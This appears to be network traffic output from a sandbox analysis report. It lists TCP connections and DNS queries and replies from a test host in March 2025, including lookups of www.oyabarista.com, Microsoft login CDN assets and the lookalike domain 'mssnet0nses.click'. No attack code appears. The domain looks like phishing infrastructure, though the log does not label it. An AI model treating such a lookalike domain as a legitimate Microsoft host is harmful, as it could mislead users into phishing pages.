                                                        Mar 27, 2025 14:42:29.597119093 CET44349933172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.597197056 CET44349933172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.597263098 CET49933443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.599817038 CET49933443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.599853992 CET44349933172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.603255987 CET49934443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.603290081 CET44349934172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.603907108 CET49934443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.603951931 CET49935443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.603984118 CET44349935172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.604034901 CET49935443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.604242086 CET49934443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.604254961 CET44349934172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.604404926 CET49935443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.604418993 CET44349935172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.605118990 CET49936443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.605156898 CET44349936172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.605211973 CET49936443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.605355024 CET49936443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.605369091 CET44349936172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.777426004 CET44349935172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.777708054 CET49935443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.777734995 CET44349935172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.777920961 CET49935443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.777925968 CET44349935172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.778373957 CET44349934172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.778557062 CET49934443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.778587103 CET44349934172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.778686047 CET49934443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.778692961 CET44349934172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.781399012 CET44349936172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.781549931 CET49936443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.781577110 CET44349936172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:29.781641006 CET49936443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:29.781646013 CET44349936172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.075962067 CET44349934172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.076031923 CET44349934172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.076159954 CET49934443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.076667070 CET49934443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.076683044 CET44349934172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.077716112 CET49937443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.077768087 CET44349937172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.077832937 CET49937443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.077976942 CET49937443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.078006983 CET44349937172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.079966068 CET44349936172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.080027103 CET44349936172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.080121994 CET49936443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.080580950 CET49936443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.080596924 CET44349936172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.082006931 CET44349935172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.082068920 CET44349935172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.082122087 CET49935443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.082413912 CET49935443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.082428932 CET44349935172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.083173037 CET49938443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.083208084 CET44349938172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.083282948 CET49938443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.083650112 CET49938443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.083666086 CET44349938172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.252764940 CET44349937172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.253235102 CET49937443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.253278017 CET44349937172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.253434896 CET49937443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.253443003 CET44349937172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.258666992 CET44349938172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.258933067 CET49938443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.258955956 CET44349938172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.259216070 CET49938443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.259222031 CET44349938172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.570271969 CET44349938172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.570379972 CET44349938172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.570427895 CET49938443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.571222067 CET49938443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.571249008 CET44349938172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.574877024 CET49939443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.574920893 CET44349939172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.575174093 CET49939443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.575174093 CET49939443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.575205088 CET44349939172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.752722979 CET44349939172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.753143072 CET49939443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.753170013 CET44349939172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.753318071 CET49939443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.753324032 CET44349939172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.850579977 CET49940443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.850620985 CET44349940172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:30.850852966 CET49940443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.851011038 CET49940443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:30.851020098 CET44349940172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.026137114 CET44349940172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.026411057 CET49940443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.026448011 CET44349940172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.026626110 CET49940443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.026633024 CET44349940172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.075647116 CET44349937172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.075719118 CET44349937172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.075772047 CET49937443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.076278925 CET49937443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.076297045 CET44349937172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.081758976 CET44349939172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.081823111 CET44349939172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.081923962 CET49939443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.096708059 CET49918443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.096893072 CET44349918104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.097022057 CET49918443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.098141909 CET49939443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.098164082 CET44349939172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.099693060 CET49940443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.099766970 CET44349940172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.099935055 CET49940443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.099939108 CET44349940172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.099991083 CET49940443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.101027966 CET49930443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.101027966 CET49930443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.101125956 CET44349930104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.101361036 CET49930443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.101402998 CET44349930104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.101501942 CET49930443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.101572037 CET44349930104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.101671934 CET49930443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.101697922 CET44349930104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.101754904 CET49930443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.101754904 CET49930443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.101772070 CET44349930104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.101797104 CET49930443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.101808071 CET44349930104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.103988886 CET49941443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.104022026 CET44349941104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.104176998 CET49941443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.106040955 CET49941443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.106057882 CET44349941104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.142121077 CET49942443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.142163038 CET44349942172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.142330885 CET49942443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.142560005 CET49942443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.142574072 CET44349942172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.286606073 CET44349941104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.288343906 CET49941443192.168.2.5104.21.70.232
                                                        Mar 27, 2025 14:42:31.288373947 CET44349941104.21.70.232192.168.2.5
                                                        Mar 27, 2025 14:42:31.319267988 CET44349942172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.320111990 CET49942443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.320142984 CET44349942172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.320163012 CET49942443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.320168972 CET44349942172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.620306969 CET44349942172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.620440006 CET44349942172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:31.620583057 CET49942443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.621248007 CET49942443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:31.621265888 CET44349942172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:32.600866079 CET49943443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:32.600917101 CET44349943172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:32.601066113 CET49943443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:32.601197004 CET49943443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:32.601207018 CET44349943172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:32.779130936 CET44349943172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:32.779452085 CET49943443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:32.779484034 CET44349943172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:32.779822111 CET49943443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:32.779829025 CET44349943172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.079695940 CET44349943172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.079761982 CET44349943172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.079962969 CET49943443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.080431938 CET49943443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.080450058 CET44349943172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.081950903 CET49944443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.081991911 CET44349944172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.082276106 CET49944443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.082341909 CET49944443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.082354069 CET44349944172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.258780003 CET44349944172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.259469986 CET49944443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.259499073 CET44349944172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.259660006 CET49944443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.259666920 CET44349944172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.563523054 CET44349944172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.563589096 CET44349944172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.564066887 CET49944443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.566448927 CET49944443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.566453934 CET49945443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.566468954 CET44349944172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.566492081 CET44349945172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.567431927 CET49946443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.567481041 CET44349946172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.567518950 CET49945443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.567631006 CET49946443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.567888021 CET49946443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.567900896 CET44349946172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.568418026 CET49945443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.568419933 CET49947443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.568448067 CET44349947172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.568459034 CET44349945172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.568662882 CET49947443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.568662882 CET49947443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.568687916 CET44349947172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.744976044 CET44349946172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.745220900 CET49946443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.745249033 CET44349946172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.745404005 CET49946443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.745409966 CET44349946172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.746026039 CET44349947172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.746195078 CET49947443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.746211052 CET44349947172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.746328115 CET49947443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:33.746331930 CET44349947172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.751012087 CET44349945172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:33.799468040 CET49945443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:34.008495092 CET44349946172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:34.008557081 CET44349946172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:34.008599997 CET49946443192.168.2.5172.64.80.1
                                                        Mar 27, 2025 14:42:34.009780884 CET44349947172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:34.009850025 CET44349947172.64.80.1192.168.2.5
                                                        Mar 27, 2025 14:42:34.010004997 CET49947443192.168.2.5172.64.80.1
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 27, 2025 14:41:11.292300940 CET53642751.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:11.429172039 CET53523551.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:11.863379955 CET53532161.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:12.014601946 CET53557191.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:15.223923922 CET5481553192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:15.224250078 CET6130153192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:15.307034969 CET53548151.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:15.307059050 CET53613011.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:16.473262072 CET5270853192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:16.473496914 CET6485553192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:16.570664883 CET53527081.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:16.574084044 CET53648551.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:19.566155910 CET5315753192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:19.566472054 CET6275453192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:19.648933887 CET53531571.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:19.649183989 CET53627541.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:25.332910061 CET5142853192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:25.333416939 CET5320753192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:25.333631992 CET6266853192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:25.333631992 CET5813153192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:25.333971977 CET5131253192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:25.335000038 CET6464453192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:25.416240931 CET53514281.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:25.416585922 CET53626681.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:25.416599989 CET53581311.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:25.416613102 CET53513121.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:25.418090105 CET53646441.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:25.430932045 CET53532071.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:26.225919008 CET5087553192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:26.226366997 CET6106453192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:26.308700085 CET53508751.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:26.309103966 CET53610641.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:26.309703112 CET53521731.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:26.446652889 CET53542011.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:26.708713055 CET6013353192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:26.708931923 CET4937353192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:26.791951895 CET53601331.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:26.791977882 CET53493731.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:26.794902086 CET53553961.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:28.716505051 CET5092453192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:28.716548920 CET5214553192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:28.799396038 CET53509241.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:28.799417973 CET53521451.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:29.103301048 CET53587581.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:40.001887083 CET4967553192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:40.002119064 CET6093153192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:40.091831923 CET53609311.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:40.104636908 CET53496751.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:41.228094101 CET5630253192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:41.228270054 CET5294853192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:41:41.312186003 CET53563021.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:41.312200069 CET53529481.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:41:47.308549881 CET5363039162.159.36.2192.168.2.5
                                                        Mar 27, 2025 14:41:47.823303938 CET53529091.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:42:05.990773916 CET138138192.168.2.5192.168.2.255
                                                        Mar 27, 2025 14:42:10.562284946 CET53493591.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:42:11.139764071 CET53519171.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:42:19.569606066 CET5071753192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:42:19.570063114 CET4994653192.168.2.51.1.1.1
                                                        Mar 27, 2025 14:42:19.652960062 CET53507171.1.1.1192.168.2.5
                                                        Mar 27, 2025 14:42:19.653486967 CET53499461.1.1.1192.168.2.5
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Mar 27, 2025 14:41:15.223923922 CET192.168.2.51.1.1.10x47dcStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:15.224250078 CET192.168.2.51.1.1.10xdc77Standard query (0)www.google.com65IN (0x0001)false
                                                        Mar 27, 2025 14:41:16.473262072 CET192.168.2.51.1.1.10x9fa1Standard query (0)www.oyabarista.comA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:16.473496914 CET192.168.2.51.1.1.10xaa51Standard query (0)www.oyabarista.com65IN (0x0001)false
                                                        Mar 27, 2025 14:41:19.566155910 CET192.168.2.51.1.1.10x343cStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:19.566472054 CET192.168.2.51.1.1.10x3f7dStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.332910061 CET192.168.2.51.1.1.10xcfefStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.333416939 CET192.168.2.51.1.1.10x83bdStandard query (0)cdn.socket.io65IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.333631992 CET192.168.2.51.1.1.10xceStandard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.333631992 CET192.168.2.51.1.1.10x3bbfStandard query (0)www.w3schools.com65IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.333971977 CET192.168.2.51.1.1.10xd529Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.335000038 CET192.168.2.51.1.1.10x7843Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.225919008 CET192.168.2.51.1.1.10xb7f5Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.226366997 CET192.168.2.51.1.1.10x6f6aStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.708713055 CET192.168.2.51.1.1.10xda3Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:26.708931923 CET192.168.2.51.1.1.10x5190Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                        Mar 27, 2025 14:41:28.716505051 CET192.168.2.51.1.1.10xd263Standard query (0)www.oyabarista.comA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:28.716548920 CET192.168.2.51.1.1.10x6f3aStandard query (0)www.oyabarista.com65IN (0x0001)false
                                                        Mar 27, 2025 14:41:40.001887083 CET192.168.2.51.1.1.10x8e04Standard query (0)mssnet0nses.clickA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:40.002119064 CET192.168.2.51.1.1.10xefd3Standard query (0)mssnet0nses.click65IN (0x0001)false
                                                        Mar 27, 2025 14:41:41.228094101 CET192.168.2.51.1.1.10x1b11Standard query (0)mssnet0nses.clickA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:41.228270054 CET192.168.2.51.1.1.10xb9c1Standard query (0)mssnet0nses.click65IN (0x0001)false
                                                        Mar 27, 2025 14:42:19.569606066 CET192.168.2.51.1.1.10x8866Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:42:19.570063114 CET192.168.2.51.1.1.10x6d3eStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Mar 27, 2025 14:41:15.307034969 CET1.1.1.1192.168.2.50x47dcNo error (0)www.google.com142.250.81.228A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:15.307059050 CET1.1.1.1192.168.2.50xdc77No error (0)www.google.com65IN (0x0001)false
                                                        Mar 27, 2025 14:41:16.570664883 CET1.1.1.1192.168.2.50x9fa1No error (0)www.oyabarista.com104.21.70.232A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:16.570664883 CET1.1.1.1192.168.2.50x9fa1No error (0)www.oyabarista.com172.67.168.189A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:16.574084044 CET1.1.1.1192.168.2.50xaa51No error (0)www.oyabarista.com65IN (0x0001)false
                                                        Mar 27, 2025 14:41:19.648933887 CET1.1.1.1192.168.2.50x343cNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416240931 CET1.1.1.1192.168.2.50xcfefNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416240931 CET1.1.1.1192.168.2.50xcfefNo error (0)d2vgu95hoyrpkh.cloudfront.net3.168.73.27A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416240931 CET1.1.1.1192.168.2.50xcfefNo error (0)d2vgu95hoyrpkh.cloudfront.net3.168.73.64A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416240931 CET1.1.1.1192.168.2.50xcfefNo error (0)d2vgu95hoyrpkh.cloudfront.net3.168.73.40A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416240931 CET1.1.1.1192.168.2.50xcfefNo error (0)d2vgu95hoyrpkh.cloudfront.net3.168.73.8A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 14:41:25.416585922 CET1.1.1.1192.168.2.50xceNo error (0)www.w3schools.comwww.w3schools.com-v1.edgesuite.netCNAME (Canonical name)IN (0x0001)false
